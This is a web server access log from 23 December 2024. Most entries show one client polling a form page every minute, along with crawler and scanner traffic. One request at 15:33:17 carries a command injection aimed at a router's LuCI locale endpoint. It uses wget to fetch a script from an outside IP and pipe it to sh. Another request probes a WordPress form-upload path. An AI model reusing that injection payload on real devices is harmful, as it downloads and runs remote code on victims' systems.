178.165.191.42 - - [23/Dec/2024:14:54:45 +0100] "GET /gui/javascript/form_form.js?1734962085 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962025" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:55:45 +0100] "GET /entry.php?id=10271&&ser=962085 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962025" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:55:45 +0100] "GET /gui/javascript/form_form.js?1734962145 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962085" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:56:45 +0100] "GET /entry.php?id=10271&&ser=962145 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962085" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:56:46 +0100] "GET /gui/javascript/form_form.js?1734962205 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962145" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
154.213.187.122 - - [23/Dec/2024:14:56:55 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
178.165.191.42 - - [23/Dec/2024:14:57:46 +0100] "GET /entry.php?id=10271&&ser=962205 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962145" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:57:46 +0100] "GET /gui/javascript/form_form.js?1734962266 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962205" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [23/Dec/2024:14:58:06 +0100] "GET /docs/contadino/2017/RE17-000028.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:14:58:46 +0100] "GET /entry.php?id=10271&&ser=962266 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962205" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:58:46 +0100] "GET /gui/javascript/form_form.js?1734962326 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:59:46 +0100] "GET /entry.php?id=10271&&ser=962326 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:59:46 +0100] "GET /gui/javascript/form_form.js?1734962386 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962326" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:00:47 +0100] "GET /entry.php?id=10271&&ser=962386 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962326" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:00:47 +0100] "GET /gui/javascript/form_form.js?1734962447 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:01:47 +0100] "GET /entry.php?id=10271&&ser=962447 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:01:47 +0100] "GET /gui/javascript/form_form.js?1734962507 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [23/Dec/2024:15:02:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001271103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:15:02:47 +0100] "GET /entry.php?id=10271&&ser=962507 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:02:47 +0100] "GET /gui/javascript/form_form.js?1734962567 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962507" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:03:47 +0100] "GET /entry.php?id=10271&&ser=962567 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962507" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:03:48 +0100] "GET /gui/javascript/form_form.js?1734962627 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962567" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:04:48 +0100] "GET /entry.php?id=10271&&ser=962627 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962567" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:04:48 +0100] "GET /gui/javascript/form_form.js?1734962688 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962627" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:05:48 +0100] "GET /entry.php?id=10271&&ser=962688 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=962627" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:05:48 +0100] "GET /gui/javascript/form_form.js?1734962748 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962688" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [23/Dec/2024:15:06:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:15:06:48 +0100] "GET /entry.php?id=10271&&ser=962748 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962688" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:06:48 +0100] "GET /gui/javascript/form_form.js?1734962808 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962748" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:07:49 +0100] "GET /entry.php?id=10271&&ser=962808 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962748" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:07:49 +0100] "GET /gui/javascript/form_form.js?1734962869 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:08:49 +0100] "GET /entry.php?id=10271&&ser=962869 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:08:49 +0100] "GET /gui/javascript/form_form.js?1734962929 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:09:49 +0100] "GET /entry.php?id=10271&&ser=962929 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:09:49 +0100] "GET /gui/javascript/form_form.js?1734962989 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962929" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [23/Dec/2024:15:10:07 +0100] "GET /ed.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.145.105 - - [23/Dec/2024:15:10:14 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.105 - - [23/Dec/2024:15:10:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [23/Dec/2024:15:10:19 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [23/Dec/2024:15:10:19 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [23/Dec/2024:15:10:19 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
178.165.191.42 - - [23/Dec/2024:15:10:49 +0100] "GET /entry.php?id=10271&&ser=962989 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962929" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:10:50 +0100] "GET /gui/javascript/form_form.js?1734963050 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=962989" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:11:50 +0100] "GET /entry.php?id=10271&&ser=963050 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=962989" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:11:50 +0100] "GET /gui/javascript/form_form.js?1734963110 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963050" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:12:50 +0100] "GET /entry.php?id=10271&&ser=963110 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963050" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:12:50 +0100] "GET /gui/javascript/form_form.js?1734963170 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963110" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:13:50 +0100] "GET /entry.php?id=10271&&ser=963170 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963110" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:13:51 +0100] "GET /gui/javascript/form_form.js?1734963231 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963170" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [23/Dec/2024:15:14:07 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108201503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:15:14:51 +0100] "GET /entry.php?id=10271&&ser=963231 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963170" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:14:51 +0100] "GET /gui/javascript/form_form.js?1734963291 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963231" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:15:51 +0100] "GET /entry.php?id=10271&&ser=963291 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963231" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:15:51 +0100] "GET /gui/javascript/form_form.js?1734963351 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963291" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:16:51 +0100] "GET /entry.php?id=10271&&ser=963351 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963291" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:16:51 +0100] "GET /gui/javascript/form_form.js?1734963411 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963351" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
95.214.55.79 - - [23/Dec/2024:15:17:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.191.42 - - [23/Dec/2024:15:17:52 +0100] "GET /entry.php?id=10271&&ser=963411 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963351" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:17:52 +0100] "GET /gui/javascript/form_form.js?1734963472 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963411" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:18:52 +0100] "GET /entry.php?id=10271&&ser=963472 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963411" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:18:52 +0100] "GET /gui/javascript/form_form.js?1734963532 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963472" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:19:52 +0100] "GET /entry.php?id=10271&&ser=963532 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963472" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:19:52 +0100] "GET /gui/javascript/form_form.js?1734963592 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963532" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:20:52 +0100] "GET /entry.php?id=10271&&ser=963592 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963532" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:20:53 +0100] "GET /gui/javascript/form_form.js?1734963653 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
202.112.47.148 - - [23/Dec/2024:15:21:30 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.165.191.42 - - [23/Dec/2024:15:21:53 +0100] "GET /entry.php?id=10271&&ser=963653 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:21:53 +0100] "GET /gui/javascript/form_form.js?1734963713 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963653" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.128.34.35 - - [23/Dec/2024:15:22:27 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:15:22:53 +0100] "GET /entry.php?id=10271&&ser=963713 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963653" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:22:53 +0100] "GET /gui/javascript/form_form.js?1734963773 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963713" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:23:53 +0100] "GET /entry.php?id=10271&&ser=963773 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963713" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:23:53 +0100] "GET /gui/javascript/form_form.js?1734963833 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963773" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:24:54 +0100] "GET /entry.php?id=10271&&ser=963833 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963773" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:24:54 +0100] "GET /gui/javascript/form_form.js?1734963894 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963833" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:25:54 +0100] "GET /entry.php?id=10271&&ser=963894 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963833" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:25:54 +0100] "GET /gui/javascript/form_form.js?1734963954 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963894" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.128.115.102 - - [23/Dec/2024:15:26:28 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.142.236.43 - - [23/Dec/2024:15:26:40 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [23/Dec/2024:15:26:40 +0100] "GET /robots.txt HTTP/1.1" 404 355 "-" "-"
185.142.236.43 - - [23/Dec/2024:15:26:41 +0100] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-"
185.142.236.43 - - [23/Dec/2024:15:26:42 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-"
185.142.236.43 - - [23/Dec/2024:15:26:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
194.38.23.16 - - [23/Dec/2024:15:26:47 +0100] "GET /wp-content/plugins/formcraft/file-upload/server/content/upload.php HTTP/1.1" 404 418 "-" "ALittle Client"
194.38.23.16 - - [23/Dec/2024:15:26:50 +0100] "GET /wp-content/plugins/formcraft/file-upload/server/content/upload.php HTTP/1.1" 404 431 "-" "ALittle Client"
178.165.191.42 - - [23/Dec/2024:15:26:54 +0100] "GET /entry.php?id=10271&&ser=963954 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=963894" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:26:54 +0100] "GET /gui/javascript/form_form.js?1734964014 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=963954" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:27:55 +0100] "GET /entry.php?id=10271&&ser=964014 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=963954" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:27:55 +0100] "GET /gui/javascript/form_form.js?1734964075 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964014" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:28:55 +0100] "GET /entry.php?id=10271&&ser=964075 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=964014" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:28:55 +0100] "GET /gui/javascript/form_form.js?1734964135 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964075" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:29:55 +0100] "GET /entry.php?id=10271&&ser=964135 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=964075" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:29:55 +0100] "GET /gui/javascript/form_form.js?1734964195 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964135" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.128.40.248 - - [23/Dec/2024:15:30:27 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:15:30:55 +0100] "GET /entry.php?id=10271&&ser=964195 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=964135" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:30:56 +0100] "GET /gui/javascript/form_form.js?1734964256 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964195" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:31:56 +0100] "GET /entry.php?id=10271&&ser=964256 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=964195" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:31:56 +0100] "GET /gui/javascript/form_form.js?1734964316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964256" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:32:56 +0100] "GET /entry.php?id=10271&&ser=964316 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=964256" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:32:56 +0100] "GET /gui/javascript/form_form.js?1734964376 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
31.220.1.144 - - [23/Dec/2024:15:33:17 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.191.42 - - [23/Dec/2024:15:33:56 +0100] "GET /entry.php?id=10271&&ser=964376 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=964316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:15:33:57 +0100] "GET /gui/javascript/form_form.js?1734964437 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=964376" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.128.19.1 - - [23/Dec/2024:15:34:27 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
